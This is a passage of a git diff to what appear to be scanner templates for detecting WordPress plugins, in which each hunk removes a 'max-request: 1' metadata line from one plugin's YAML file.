@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
